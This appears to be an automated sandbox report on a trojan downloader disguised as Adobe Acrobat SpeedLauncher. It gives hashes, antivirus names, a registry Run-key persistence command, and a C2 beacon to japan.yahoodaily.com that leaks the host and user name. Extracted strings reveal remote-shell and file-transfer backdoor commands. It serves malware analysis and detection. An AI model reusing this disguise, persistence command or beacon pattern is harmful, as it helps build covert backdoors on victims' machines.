Analysis Date: 2014-01-03 11:04:30
MD5: 36c0d3f109aede4d76b05431f8a64f9e
SHA1: f60973d256757c057b5e40ae0a5631ad314ab981

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 0fe9ed26ee8dac2ad66f17fe931e5cc4 sha1: 569a2df945e22f828a868388e0623aafe89122f7 size: 9728
Section .rdata md5: 7df1e22dadbdcf85ea4f531e5aa7147e sha1: 82afd757494f7bf09292f2f0e6cda5e20e72580f size: 3072
Section .data md5: b9277061e5492acfb00af0a376231807 sha1: 574362a41a65042137f6ebc0c3f2ea2cdead3b16 size: 2560
Section .rsrc md5: 9721dcc7e94f7acf151c715cd34476f4 sha1: 824b27c0ee844c7b06592beed30ac3c561db1cf3 size: 1024
Timestamp: 2009-02-05 07:14:01
Version:
LegalCopyright: Copyright Adobe Systems Incorporated 2004
FileVersion: 8, 0, 0, 0
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 8, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
Packer: Microsoft Visual C++ v6.0
PE hash: 9cdb7e791d9adb73e14aee04eea88c3006d3c666
AV (avg): Generic14.HE
AV (clamav): Trojan.Downloader-74679
AV (mcafee): RDN/Downloader.a!bi

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe
Creates Process: reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f
Creates Mutex: GLOBAL\ADR32
Winsock URL: http://japan.yahoodaily.com/index.html

Process
↳ reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher ➝ C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe\\x00

Network Details:

DNS: japan.yahoodaily.com
Type: A
96.43.141.186
HTTP GET: http://japan.yahoodaily.com/index.html
User-Agent: 5.1 02:14 COMPUTER-XXXXXX\Administrator
Flows: TCP 192.168.1.1:1031 ➝ 96.43.141.186:80

Raw Pcap

Strings
040904e4
8, 0, 0, 0
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright Adobe Systems Incorporated 2004
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
090205
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
add "HKCU\%s" /v "%s" /d "%s" /f
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
AllocConsole
 and the PID is %d
\Application Data\Adobe\reader_sl.exe
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
CreateDirectoryA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
__CxxFrameHandler
@.data
%d.%d %02d:%02d %s\%s
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\ADR32
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
IE 8.5
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
memcpy
memset
Mozilla/5.0
~MS80547.bat
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
reg.exe
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetStdHandle
__setusermatherr
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
Totally %d volumes found.
Unkown		
URLDownloadToFileA
urlmon.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
WaitForSingleObject
whoami
width=
WININET.dll
WriteConsoleInputA
WriteFile
_XcptFilter